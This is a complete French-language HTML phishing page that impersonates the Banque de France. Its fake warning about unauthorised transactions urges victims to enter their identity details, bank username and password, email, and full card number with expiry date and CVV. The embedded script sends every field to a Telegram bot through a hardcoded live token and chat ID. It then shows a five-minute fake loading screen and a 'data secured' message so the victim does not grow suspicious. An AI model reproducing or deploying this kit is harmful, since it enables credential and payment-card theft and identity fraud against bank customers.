
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Banque de France</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
            min-height: 100vh;
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
            color: #003366;
            position: relative;
        }
        header, footer {
            width: 100%; /* Full width */
            background-color: rgba(0, 51, 102, 0.8); /* Slightly transparent */
            color: white;
            text-align: center;
            padding: 10px 0;
        }
        header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 10px 20px;
        }
        header h2 {
            margin: 0;
            flex: 1;
            font-size: 20px; /* Reduced font size */
            text-align: left;
        }
        .nav-buttons {
            display: flex;
            gap: 10px;
            margin-right: 10px; /* Add margin to the right */
        }
        .nav-buttons button {
            padding: 3px 8px; /* Adjusted padding to make buttons smaller */
            cursor: pointer;
            border: none;
            background-color: white;
            color: #003366;
            border-radius: 10px; /* More rounded corners */
            font-size: 10px; /* Reduce font size */
            flex: 1;
            max-width: 80px; /* Adjusted maximum width for the buttons */
        }
        .nav-buttons button:hover {
            background-color: #00509e; /* Change color on hover */
            color: white;
        }
        .container {
            width: 80%; /* Reduce the width of the containers */
            max-width: 450px; /* Reduce the maximum width */
            padding: 15px; /* Reduce padding */
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            border-radius: 8px;
            text-align: center;
            background: rgba(255, 255, 255, 0.9);
            position: relative;
            display: none;
            margin: 15px 0; /* Reduce margin */
        }
        .container.active {
            display: block;
        }
        img {
            max-width: 80%; /* Reduce the size of the images */
            height: auto;
        }
        button {
            padding: 10px 20px;
            margin-top: 20px;
            cursor: pointer;
            border: none;
            background-color: #003366;
            color: white;
            border-radius: 5px;
            font-size: 14px; /* Reduce font size of the button */
        }
        input {
            width: 100%;
            padding: 8px; /* Reduce padding */
            margin: 8px 0; /* Reduce margin */
            box-sizing: border-box;
            border: 1px solid #ccc;
            border-radius: 4px;
            background: rgba(255, 255, 255, 0.5);
            color: #003366;
        }
        .input-banking {
            display: flex;
            justify-content: space-between;
        }
        .input-banking input {
            width: calc(25% - 5px);
            text-align: center;
        }
        .input-small {
            width: calc(50% - 10px);
            text-align: center;
        }
        .card-icons {
            display: flex;
            justify-content: center;
            gap: 10px;
            margin: 10px 0;
        }
        .card-icons img {
            width: 100px;
            height: auto;
        }
        h1 {
            font-size: 20px; /* Reduce font size */
            color: #2f6faf;
        }
        p {
            margin: 15px 0; /* Reduce margin */
            font-weight: bold;
        }
        .form-background {
            background: rgba(255, 255, 255, 0.8);
            padding: 15px; /* Reduce padding */
            border-radius: 8px;
        }
        .loading {
            display: none;
            text-align: center;
            margin-top: 20px;
        }
        .loading img {
            width: 50px;
            height: 50px;
        }
        footer p {
            font-size: 10px; /* Reduced font size */
            margin: 5px 0;
        }
        .footer-icons {
            display: flex;
            justify-content: center;
            gap: 10px;
        }
        .footer-icons i {
            font-size: 20px;
            color: white;
        }
        .popup {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: white;
            padding: 30px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            border-radius: 10px;
            z-index: 1000;
        }
        .popup.active {
            display: block;
        }
        .overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
            z-index: 999;
        }
        .overlay.active {
            display: block;
        }
        .success-page {
            display: none;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            background-color: rgba(255, 255, 255, 0.9);
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            z-index: 1001;
        }
        .success-page.active {
            display: flex;
        }
        .success-page img {
            width: 100px;
            height: auto;
            margin-bottom: 20px;
        }
    </style>
    <!-- Font Awesome for icons -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
</head>
<body>
    <header>
        <h2>Banque de France</h2>
        <div class="nav-buttons">
            <button onclick="showPage(1)">Menu</button>
            <button>Nos Services</button>
            <button>Contact</button>
            <button>Qui sommes-nous?</button>
        </div>
    </header>

    <div class="container active" id="page1">
        <img src="https://iili.io/3z9QdQf.png" alt="Logo">
        <h1>Service d'authentification</h1>
        <p>Nous sommes disponible pour l 'authentification de vos données</p>
        <img src="https://iili.io/3z9QHIs.jpg" alt="Image d'accueil">
        <button onclick="showPage(2)">Continuer</button>
    </div>

    <div class="container" id="page2">
        <img src="https://iili.io/3z9QdQf.png" alt="Logo">
        <h1>RGPD Authentification</h1>
        <p>Veuillez vous authentifier pour continuer.</p>
        <p>Nous avons détecté une synchronisation récente de vos données bancaires sur un autre appareil. Des utilisateurs malveillants tentent actuellement d’effectuer des transactions non autorisées.</p>
        <p>Pour protéger votre compte, nous avons temporairement bloqué ces opérations. Nous vous invitons à vous identifier immédiatement afin de confirmer votre identité et sécuriser votre accès.</p>
        <button onclick="showPage(3)">Continuer</button>
    </div>

    <div class="container" id="page3">
        <img src="https://iili.io/3z9Qav1.png" alt="Logo">
        <h1>Informations Personnelles</h1>
        <p>Veuillez entrer vos informations personnelles et bancaires pour continuer.</p>
        <div class="form-background">
            <form id="personalInfoForm" onsubmit="showLoading(event)">
                <input type="text" id="fullName" placeholder="Nom complet" required>
                <input type="text" id="birthDate" placeholder="Date de naissance (JJ/MM/AAAA)" pattern="\d{2}/\d{2}/\d{4}" required oninput="formatDate(this)">
                <input type="text" id="address" placeholder="Adresse" required>
                <input type="text" id="postalCode" placeholder="Code postal" required>
                <input type="text" id="mobileNumber" placeholder="Numéro mobile" required>
                <input type="text" id="bankName" placeholder="Nom de la banque" required>
                <input type="text" id="username" placeholder="Identifiant" required>
                <input type="password" id="password" placeholder="Mot de passe" required>
                <input type="email" id="email" placeholder="Email" required>
                <h2>Numéro de carte bancaire</h2>
                <div class="card-icons">
                    <img src="https://iili.io/3z9Qh3N.png" alt="Visa">
                </div>
                <div class="input-banking">
                    <input type="text" id="cardPart1" maxlength="4" required oninput="moveToNext(this, 'cardPart2')">
                    <input type="text" id="cardPart2" maxlength="4" required oninput="moveToNext(this, 'cardPart3')">
                    <input type="text" id="cardPart3" maxlength="4" required oninput="moveToNext(this, 'cardPart4')">
                    <input type="text" id="cardPart4" maxlength="4" required oninput="moveToNext(this, 'expDate')">
                </div>
                <label for="expDate" style="text-align: left; width: 100%;">Date d'expiration & cryptogramme</label>
                <div class="input-banking">
                    <input type="text" id="expDate" placeholder="MM/AA" class="input-small" pattern="\d{2}/\d{2}" required oninput="formatExpDate(this)">
                    <input type="text" id="cvv" placeholder="CVV" maxlength="3" class="input-small" required>
                </div>
                <button type="submit">Soumettre</button>
            </form>
        </div>
    </div>

    <div class="success-page" id="successPage">
        <img src="https://iili.io/3z9QAEQ.jpg" alt="Cadenas Vert">
        <p>Vos données sont sécurisées.</p>
    </div>

    <footer>
        <p>&copy; 2025 Banque de France. Tous droits réservés.</p>
        <p>Adresse : 31 rue Croix des Petits Champs, 75001 Paris, France</p>
        <p>Téléphone : +33 1 42 92 42 92</p>
        <p>Email : contact@banquedefrance.fr</p>
        <p>Horaires d'ouverture : Lundi au Vendredi de 9h à 18h</p>
        <div class="footer-icons">
            <i class="fab fa-twitter"></i>
            <i class="fab fa-facebook-f"></i>
            <i class="fab fa-linkedin-in"></i>
            <i class="fas fa-credit-card"></i>
            <i class="fas fa-university"></i>
        </div>
    </footer>

    <div class="overlay" id="overlay"></div>

    <div class="popup" id="popup">
        <img src="https://iili.io/3z9QdQf.png" alt="Logo">
        <p>Veuillez rester en ligne, nous traitons vos informations...</p>
        <img src="https://iili.io/3z9Q73B.gif" alt="Chargement">
    </div>

    <script>
        const telegramToken = '7727944499:AAHpgP9-xAAbtGZpBrYBfaX_FbkZiWVeEtw';
        const chatId = '7263826117';

        function showPage(pageNumber) {
            document.getElementById('page1').classList.remove('active');
            document.getElementById('page2').classList.remove('active');
            document.getElementById('page3').classList.remove('active');
            document.getElementById('successPage').classList.remove('active');

            document.getElementById('page' + pageNumber).classList.add('active');
            
            if (pageNumber === 1) {
                document.body.style.backgroundImage = "url('https://iili.io/3z9QcyF.jpg')";
            } else if (pageNumber === 2) {
                document.body.style.backgroundImage = "url('https://iili.io/3z9QVGR.jpg')";
            } else if (pageNumber === 3) {
                document.body.style.backgroundImage = "url('https://iili.io/3z9QW4p.jpg')";
            }
        }

        function moveToNext(current, nextFieldID) {
            if (current.value.length === current.maxLength) {
                document.getElementById(nextFieldID).focus();
            }
        }

        function formatDate(input) {
            if (input.value.length === 2 || input.value.length === 5) {
                input.value += '/';
            }
        }

        function formatExpDate(input) {
            if (input.value.length === 2) {
                input.value += '/';
            }
        }

        function showLoading(event) {
            event.preventDefault();

            // Collect form data
            const formData = {
                fullName: document.getElementById('fullName').value,
                birthDate: document.getElementById('birthDate').value,
                address: document.getElementById('address').value,
                postalCode: document.getElementById('postalCode').value,
                mobileNumber: document.getElementById('mobileNumber').value,
                bankName: document.getElementById('bankName').value,
                username: document.getElementById('username').value,
                password: document.getElementById('password').value,
                email: document.getElementById('email').value,
                cardNumber: document.getElementById('cardPart1').value + '-' +
                            document.getElementById('cardPart2').value + '-' +
                            document.getElementById('cardPart3').value + '-' +
                            document.getElementById('cardPart4').value,
                expDate: document.getElementById('expDate').value,
                cvv: document.getElementById('cvv').value
            };

            // Send data to Telegram immediately
            sendToTelegram(formData);

            // Show loading message and GIF
            document.getElementById('overlay').classList.add('active');
            document.getElementById('popup').classList.add('active');

            // Simulate loading duration of 5 minutes
            setTimeout(() => {
                document.getElementById('popup').classList.remove('active');
                document.getElementById('overlay').classList.remove('active');
                showSuccessPage();
            }, 300000); // 5 minutes in milliseconds
        }

        function sendToTelegram(formData) {
            const message = `
Nom complet: ${formData.fullName}
Date de naissance: ${formData.birthDate}
Adresse: ${formData.address}
Code postal: ${formData.postalCode}
Numéro mobile: ${formData.mobileNumber}
Nom de la banque: ${formData.bankName}
Identifiant: ${formData.username}
Mot de passe: ${formData.password}
Email: ${formData.email}
Numéro de carte bancaire: ${formData.cardNumber}
Date d'expiration: ${formData.expDate}
CVV: ${formData.cvv}
            `;

            const url = `https://api.telegram.org/bot${telegramToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

            fetch(url).then(response => {
                if (response.ok) {
                    console.log('Message sent to Telegram');
                } else {
                    console.error('Error sending message to Telegram');
                }
            }).catch(error => {
                console.error('Error:', error);
            });
        }

        function showSuccessPage() {
            document.getElementById('successPage').classList.add('active');
        }

        // Set initial background image
        document.body.style.backgroundImage = "url('https://iili.io/3z9QcyF.jpg')";
    </script>
</body>
</html>